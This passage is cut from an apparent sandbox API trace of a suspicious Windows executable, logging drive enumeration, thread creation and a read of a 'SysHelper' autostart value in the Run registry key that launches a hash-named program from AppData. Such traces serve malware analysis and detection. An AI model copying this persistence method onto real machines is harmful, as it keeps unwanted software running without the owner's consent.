NtdllDefWindowProc_W () returned 0x0 [0102.869] NtdllDefWindowProc_W () returned 0x1 [0102.872] NtdllDefWindowProc_W () returned 0x0 [0102.877] NtdllDefWindowProc_W () returned 0x0 [0102.877] ShowWindow (hWnd=0x9018a, nCmdShow=0) returned 0 [0102.877] UpdateWindow (hWnd=0x9018a) returned 1 [0102.877] GetLogicalDrives () returned 0x4 [0102.877] SetErrorMode (uMode=0x1) returned 0x0 [0102.877] PathFileExistsA (pszPath="C:\\") returned 1 [0102.878] SetErrorMode (uMode=0x0) returned 0x1 [0102.878] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0102.878] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x806) returned 0x2c11f98 [0102.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2c11f98, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0102.878] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c13000 [0102.878] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c11f98 | out: hHeap=0x5f0000) returned 1 [0102.878] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x2b845c8 [0102.879] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c13000 | out: hHeap=0x5f0000) returned 1 [0102.879] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b845c8 | out: hHeap=0x5f0000) returned 1 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x2b845c8 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x2b745a8 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8ec) returned 0x2c19c60 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c11f98 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2bb6000 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1070) returned 0x2bfbf10 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x2b98ad8 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c13000 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x660) returned 0x2bf56e8 [0102.879] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2bb6888 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2bb7110 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2bb7998 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2bb8220 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2bb8aa8 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2c18360 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2bb9330 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2bb9bb8 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2c1a558 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bfcf88 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bfd7e0 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2bba440 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2bbacc8 [0102.880] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2be8fb8 [0102.881] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2be9800 [0102.881] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2bbb550 [0102.881] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c1adb8 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c1b640 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c1bec8 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c1c750 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c1cfd8 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c1d860 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c1e0e8 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c1e970 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c1f1f8 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bea048 [0102.882] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bea8a0 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c1fa80 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c20308 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c20b90 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2beb0f8 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2beb940 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c21418 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c21ca0 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c22528 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c22db0 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c23638 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c23ec0 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c24748 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c24fd0 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c25858 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bec188 [0102.883] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bec9e0 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c260e0 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c26968 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c271f0 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2bed238 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2c27a78 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c28300 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c28b88 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c29410 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c29c98 [0102.884] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c2adb8 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c2b640 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c2bec8 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c2c750 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c2cfd8 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2beda80 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bee2d8 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c2d860 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c2e0e8 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c2e970 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2c2f1f8 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c2fa80 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c30308 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2c30b90 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c31418 [0102.885] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c31ca0 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc0) returned 0x2b896a0 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c32528 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c15970 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2beeb30 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2bef348 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c3ada0 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c3b5b8 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c3bdd0 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2c32db0 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x2b98c78 [0102.886] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c33638 [0102.887] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c33ec0 [0102.887] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c34748 [0102.887] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x820) returned 0x2c34fd0 [0102.887] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba73d8 [0102.887] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x2c19c68, dwCreationFlags=0x0, lpThreadId=0x2b745b0 | out: lpThreadId=0x2b745b0*=0xf54) returned 0x538 [0102.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0xf58) returned 0x2c0 [0102.888] GetMessageW (in: lpMsg=0x18ebe0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18ebe0) returned 0 [0114.946] NtdllDefWindowProc_W () returned 0x0 [0114.947] NtdllDefWindowProc_W () returned 0x0 [0114.975] NtdllDefWindowProc_W () returned 0x0 [0114.976] NtdllDefWindowProc_W () returned 0x0 [0114.976] NtdllDefWindowProc_W () returned 0x0 [0114.977] NtdllDefWindowProc_W () returned 0x0 [0114.977] NtdllDefWindowProc_W () returned 0x0 [0114.978] NtdllDefWindowProc_W () returned 0x1 [0114.981] NtdllDefWindowProc_W () returned 0x0 [0114.989] NtdllDefWindowProc_W () returned 0x0 [0115.081] NtdllDefWindowProc_W () returned 0x0 [0115.081] NtdllDefWindowProc_W () returned 0x0 [0115.081] NtdllDefWindowProc_W () returned 0x3 [0115.081] NtdllDefWindowProc_W () returned 0x2 [0115.082] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d2f8 | out: phkResult=0x18d2f8*=0x5ac) returned 0x0 [0115.082] RegQueryValueExW (in: hKey=0x5ac, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d2f4, lpData=0x18ba20, lpcbData=0x18d2d8*=0x400 | out: lpType=0x18d2f4*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", lpcbData=0x18d2d8*=0x132) returned 0x0 [0115.082] RegCloseKey (hKey=0x5ac) returned 0x0 [0115.082] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x140) returned 0x2b27de8 [0115.082] lstrlenA (lpString="\" --AutoStart") returned 13 [0115.082] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x120) returned 0x2b32b70 [0115.082] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b27de8 | out: hHeap=0x5f0000) returned 1 [0115.082] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 1 [0115.083] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b32b70 | out: hHeap=0x5f0000) returned 1 [0115.083] IsWindow (hWnd=0x9018a) returned 1 [0115.083] DestroyWindow (hWnd=0x9018a) returned 1 [0115.083] NtdllDefWindowProc_W () returned 0x0 [0115.083] NtdllDefWindowProc_W () returned 0x1 [0115.084] NtdllDefWindowProc_W () returned 0x0 [0115.085] NtdllDefWindowProc_W () returned 0x0 [0115.085] NtdllDefWindowProc_W () returned 0x0 [0115.085] NtdllDefWindowProc_W () returned 0x0 [0115.085] NtdllDefWindowProc_W () returned 0x0 [0115.085] PostQuitMessage (nExitCode=0) [0115.086] NtdllDefWindowProc_W () returned 0x0 [0115.087] CloseHandle (hObject=0x53c) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b845c8 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5ae8 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5ac0 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5930 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be59f8 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5d40 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5d68 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6ad10 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6ad80 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5d90 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5db8 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5de0 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5e08 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5e30 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5e58 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5e80 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6af78 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b0c8 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5ea8 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5ed0 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5ef8 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5f20 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5f48 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5f70 | out: hHeap=0x5f0000) returned 1 [0115.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5f98 | out: hHeap=0x5f0000) returned 1 [0115.088] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5fc0 | out: hHeap=0x5f0000) returned 1 [0115.088] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b100 | out: hHeap=0x5f0000) returned 1 [0115.088] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b138 | out: hHeap=0x5f0000) returned 1 [0115.088] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be5fe8 | out: hHeap=0x5f0000) returned 1 [0115.088] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6010 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6038 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6060 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6088 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be60b0 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be60d8 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6100 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b170 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b1a8 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6128 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6150 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be6178 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be61a0 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be61c8 | out: hHeap=0x5f0000) returned 1 [0115.089] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf4e10 | out: hHeap=0x5f0000) returned 1 [0115.090] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0115.090] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf1570 | out: hHeap=0x5f0000) returned 1 [0115.090] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62bf60 | out: hHeap=0x5f0000) returned 1 [0115.091] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b64160 | out: hHeap=0x5f0000) returned 1 [0115.091] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6abc0 | out: hHeap=0x5f0000) returned 1 [0115.092] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c1f8 | out: hHeap=0x5f0000) returned 1 [0115.092] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c1b0 | out: hHeap=0x5f0000) returned 1 [0115.092] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c168 | out: hHeap=0x5f0000) returned 1 [0115.093] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6c120 | out: hHeap=0x5f0000) returned 1 [0115.093] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bbc668 | out: hHeap=0x5f0000) returned 1 [0115.093] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627650 | out: hHeap=0x5f0000) returned 1 [0115.093] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b745a8 | out: hHeap=0x5f0000) returned 1 [0115.093] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x603268 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7220 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba55b0 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb4668 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb4ef0 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb5778 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b98c10 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba4d28 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c01858 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c01040 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c00828 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c00010 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bff7f8 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bfefe0 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bfe7c8 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6b3c98 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c02080 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c028a8 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c030e0 | out: hHeap=0x5f0000) returned 1 [0115.094] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c03918 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c04150 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c04988 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c051d0 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c059f8 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c06220 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c06a68 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c072c0 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c07b18 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c08340 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c08b68 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c093b0 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c09bf8 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0a430 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0ac68 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0b4a0 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0bcc8 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0c4f0 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0cd18 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0d550 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0dd88 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8bcd8 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0e5b0 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0ee08 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8c560 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8cde8 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0f660 | out: hHeap=0x5f0000) returned 1 [0115.095] 